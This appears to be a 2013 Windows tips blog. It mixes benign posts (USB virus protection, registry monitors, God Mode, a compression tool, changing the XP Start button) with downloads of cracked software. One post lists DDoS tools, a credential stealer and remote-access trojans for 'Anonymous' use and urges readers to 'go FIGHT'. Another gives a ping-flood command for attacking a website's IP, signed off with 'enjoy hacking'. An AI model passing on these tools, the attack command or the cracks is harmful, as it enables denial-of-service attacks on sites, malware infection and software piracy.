Showing posts with label Windows. Show all posts
Showing posts with label Windows. Show all posts

Tuesday, August 13, 2013

Dll-Files Fixer 3.0.81 Latest With Crack Free Download

0 comments










Fix Dll Errors Safely and Easy in an Efficient Way. DllErrorsFix is the best choice for you to fix dll errors in one step which you can hold complete trust on. Get rid of unwanted dll errors that cause freezing, crashing or blue screen of death.

DLL-files Fixer Premium Version Benefits:
Resolve .dll related errors and ensure your software runs smoothly.
Eliminate .dll related system pop-up error messages.
Repair and clean your Registry of unwanted and invalid registry entries.
Optimize PC performance and speed up your system with a clean and error-free registry.
Defragment your registry to reduce startup time and memory usage.
Prevent your applications and PC from crashing.
Counteract deterioration over time. 12, 24, 36 months licenses available.
Easy to use 2-in-1 interface.








Monday, August 12, 2013

Thursday, August 8, 2013

WINDOWS START BUTTON (START8) FULL VERSION + CRACK FREE DOWNLOAD

0 comments
: SNAPSHOT OF START 8 :
======================



: ABOUT START 8 :
==============
* Windows 7-style Start menu with Windows 8 enhancements
* Search for Windows 8-style (Modern UI) apps
* Pin desktop and Metro apps to the start menu
* Jump List support
* Unified Search for apps, settings and files
* Boot directly to the Windows 8 desktop
* One click access to shut down, devices, music, documents, and videos

: CONTROL :
===========

* Configurable Start menu size
* Windows 8 Start screen accessible from the Start menu
* Clean, streamlined UI enhances Start8's usability

: CUSTOMIZATION :
=================

* Optionally disable the desktop Windows 8 "hot spots"

* Supports WindowFX 5.1 start menu animations





: DIFFERENT LOOKS :
==================

                                        



             

Tuesday, August 6, 2013

How to Protect USB Flash Drive from Viruses

0 comments

USB Flash Drives are now the most popular data transfer facility since it enables fast transmission and file sharing from computer to another. Although using USB flash drives may take down your computer with Viruses infection and you may be a victim of this vulnerability. The USB flash drives can be easily infected with viruses (especially Autorun.inf viruses, trojans, Rats...) and you can't do anything with that problem, so I'm writing this article about How you can Protect your USB Flash Drive from Viruses and make your computer more Secure when using those USB keys.



How your USB Flash Drive is Infected?




While using the USB flash drive to transfer data between computers, it may catch different types of viruses like Trojans, Rats, Worms, Autorun.inf... you cannot see how & when the virus is copied to USB flash drive,  because it works & spread silently. So when it's connected to an Infected PC the virus is directly transmitted to the USB, then the virus will do one of the following infection methods:

1)The virus creates 2 Files:  Autorun.inf & Worms Viruses
  • Autorun.inf : It auto-executes the virus simply when you double-click the USB drive in your computer.
  • Virus.exe or Virus.com : This is the virus which will be executed by the Autorun.inf, it's always a .Exe .Com or .Pif file, so it will be executed as a normal file.
2)The virus will infect any Files in the USB:  Rats & Trojans
  • The virus will start exploring and running through all the Files existing in the USB flash drive and start infecting them with itself ( binding the files ), and after you try to open any of the programs in your flash drive, your computer will get infected by the virus and it will starts the destruction.


How to Protect USB Flash Drive from Viruses


1) Using USB Flash Drive Antivirus




If you are suffering from the above 2 types of infections, then you can apply the following 3 Tricks to Protect your USB & Computer from malware, spyware or any other infections.

You can install one of the best USB Antivirus protection software to protect your computer from different attacks. When you plugin the Flash it starts analyzing all it folders and sub-folders for common types of possible attacks.

     Top USB Flash Drive Antivirus:

2) Scan for USB Viruses Manually using CMD 



You can also manually scan for Autorun.inf using the Command Prompt from Windows, by this method you can search for Autorun.inf and delete it to protect your USB drive. Here's how you can do it:


  1. Press Windows + R and type CMD to open the command prompt.
  2. Now type your USB drive letter (you can find it on Computer) followed by Autorun.inf example: F:\Autorun.inf
  3. Press Enter , if a new Notepad window is opened then you have to proceed to step 4, else your USB is not infected.
  4. If you found an Autorun in step3 then type the following command: del /a/f/s F:\Autorun.inf and replace F:\ with your drive letter/


3) Write Protect USB Drive



With this method you can protect your USB drive from writing, means that no one can copy files to it even viruses cannot make changes to your flash drive. And you can only read files easily. Here's the top software to use to Write Protect USB Drive:

How to Protect Your Registry from Viruses

0 comments


The Registry of Windows is a sort of internal database that stores all programs configurations and options. Since Windows doesn't prompt users of any new entry added to the Registry, it's easy that some malicious programs can tweak up your registry just to infect your computer (for example by adding a new entry to launch the virus on every Windows startup). To protect your registry from those harmful attacks, you need to monitor unwanted actions imported to the registry on every new program setup, run or modification, to do so by ourselves is almost impossible since the Registry contains millions of entries. In this article I'm going to show you 2 Ways to Protect your Computer from Registry malwares/viruses

1. Registry Alert


Registry Alert is the best free easy & Reliable Registry monitoring tool, it allows users to protect their computer's sensible database (reg) from different malicious programs. Once installed, it will be running reduced and in stealth mode. Whenever a new program (malicious or not) demands access to registry, the program will prompt you with a Yes or No buttons to allow or not the program to access and modify your registry. If it's a trustworthy program and it was ran by you then simply click Allow to enable registry access.






2. Monitor Registry Changes Software



Monitor Registry Changes software is a little different from the above monitor and listener tool Registry Alert. This software is no doubt a registry monitor but works in a different way, it takes a snapshot (current image of the registry) and starts listening for any new entries and - in realtime - comparing the current registry to the old created snapshot, if a difference is found then it will lists it. Another feature of this software is that you can monitor (listening) on a specific branch (example: HKLM only or HKLM/Software/Microsoft ) what will make it easy to find any suspicious access.




Friday, June 14, 2013

HOW TO activate GOd mode ON windows 7

0 comments
Hi To All ,

Every one was waiting for this post so here it goes .......







In this short tutorial, I will be teaching you how to activate God-Mode on Windows 7 (for those of you who wanted to know). God-Mode can be very useful at times!

PLEASE READ: 

DO NOT TRY THIS ON WINDOWS VISTA OR XP! IT WILL CRASH YOUR PC. IT ONLY WORKS FOR WINDOWS 7! YOU HAVE BEEN WARNED! 

So, lets get started!

STEP 1:
 Create a new folder.

STEP 2
Activating God-Mode!

Rename your folder. Name it the following code:
-------------------------------------------------------------------------------------
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
-------------------------------------------------------------------------------------

MAKE SURE YOU NAME IT THE CODE GIVEN ABOVE!

After you have clicked enter, the icon should change and the name of the folder should be "GodMode."


Open it. Inside will be all your computers options organized into sub-categories!

KGB Archiver: Compress 1GB File to 10MB

0 comments



Hello To All ,

KGB Archiver is free and open source software which compresses 1GB file to 10MB file.

Data compression utility of this software is based on PAQ6 algorithm which has AES-256 powerful encryption. KGB archiver works on both Windows and Linux operating system. Compression ratio of this software is very high. Due to high compression levels, time to compress a file goes high as the size of the file increases and compression ratio may vary depending on the format of the file.When a file is compressed with KGB Archiver it saves it with own extension and at the time of decompression it automatically recognizes the file format. The only limitation of KGB archiver is, decompressed file cannot be open or extract with other compression softwares. You can also choose any compression level (high, maximum, normal, low, very weak) to compress a file but the compression time  will vary according to your selected compression level.


Note: If you are compressing any file with KGB archiver and sending the comprssed file to your friends then he must have KBG archiver installed on his computer to decompress the file.

System Requirements:

Due to high compression ratio of KGB archiver, you need to have a decent system hardware configuration
  • 256 MB RAM
  • 1.5 GHz Processor

Features of KGB Archiver

  • Supports native .kgb files and .zip files
  • AES-256 Encryption
  • Able to create self-extracting archives.
  • Multilanguage supports like Arabic, German, Greek, Japanese, Spanish many more.
  • Unicode is supported in both User Interface and File Systems.
  • An Explorer shell extension is available for the windows version.
  • Make Password protected compressed file

    Click Here To Download KGB Archiver

Note
: This KBG Archiver software cannot compress video format files.


How to Change Windows XP Start Button

0 comments



Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

get this from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used       

                                               end

You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.


Step 2 – Modify the Registry

!!!make a backup of your registry before making changes!!!

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

In the right panel, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.

Thursday, June 13, 2013

Anonymous Weapons Dos Tools And Anonimity...

0 comments


Hi guys we share anonymous tools and they r really cool i too sometime use them :)


Downloads
=========
Anonymity
************
TOR project  https://www.torproject.org/
Virtual Private Network (VPN) I'm not suggesting free as these as are unreliable as they hand IP addresses over.There are many paid for VPN services offered at decent prices.
Do Not Track Plus stops tracking companies  http://www.abine.com/dntdetail.php 

Denial of Service tools
*****************************
LOIC (Low Orbit Ionic Cannon) DDoS tool                          
Download



JavaLOIC                                                                             Download
HOIC (High Orbit Ionic Cannon) DDoS tool                         
Download
Pyloris  DoS                                                                         
Download
Slowloris                                        
IPV6 Support               Download
Egyptian Anonymous DDoS toolkit                                      
Download
Bangledshi attack kit 
                                                           Download

Abronsius Stealer                                                               Download
anonymous-dos                                                                   Download



Arabian Attacker                                                                  Download
Archelaus RAT & DDoSer                                                    Download
Bandook                                                                              Download
ByteDOS                                                                             Download
ddosim                                                                                Download



Care packages
=============
EarthQuakeInABox  http://anonsource.org/page.php?14
More care packages  http://remainanonymous.org/get-involved/

Pirate tools
=============
Bittorrent<--- I like better lol than Utorrent http://www.bittorrent.com/
To get torrents go to http://thepiratebay.se/ or http://malaysiabay.org:6081/ its a mirror. Sweden hardly ever hands out IP addresses.
If you live in England or any site where TPB is banned download this http://filesmelt.com/dl/Unblock_Piratebay_v2.exe .
Also you can get onto most sites with the TOR PROJECT.
Sony property made by a anon  --> http://pastehtml.com/view/bllpf04jv.html
Reliable torrent site http://www.yify-torrents.com/


Anonops Radio(they need more listeners)
Anonops Radio http://www.radioanonops.com/


You have all the tools. You need. Now go FIGHT. :)

 
    








 

DDOSing without any software.

0 comments




DDOSing without any software :D

First open your CMD from run ( window + r )



Now the important thing what we want is the ip address of the site that we are going to attack.

To get the ip of any site just type nslookup in cmd followed by the address of website

for eg: if you want the ip address of google just type

nslookup http://www.google.com/  
or
ping www.google.com

these command will give you the ip address

Ok , now you got the ip address of the site you are going to attack,

then type the following command in your CMD and hit enter

ping website-IP -l 65500 -n 10000000 -w 0.00001

-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desiredvalue u want to attempt attack. 


website-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack. 


for eg: if the ip address is 112.158.10.2

just type

ping 112.158.10.2 -l 65500 -n 10000000 -w 0.00001 

And thats it you are done . Dont Change or Remove -l, -n and -w in this command.. otherwise it wont work

enjoy hacking !!! :D

Internet Download Manager 6.15 Build 10 Crack Free Download

0 comments
" Internet Download Manager 6.15 Build 10 Final Multilingual Retail "
#####################################################


Internet Download Manager 6.15 Build



After Previous Version of  IDM 6.15 now we are sharing this new version of idm.
Internet Download Manager has a good download accelerator that features smart and powerful file segmentation and safe multipart downloading technology to increase your downloading speed. Compared with other download accelerators and managers that section files before downloading starts, idm segments downloaded files dynamically during download process.
Internet Download Manager reuses available connections without additional connect and login steps to obtain better acceleration performance.IDM Also can handle proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM brings together easily into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads.



Download Now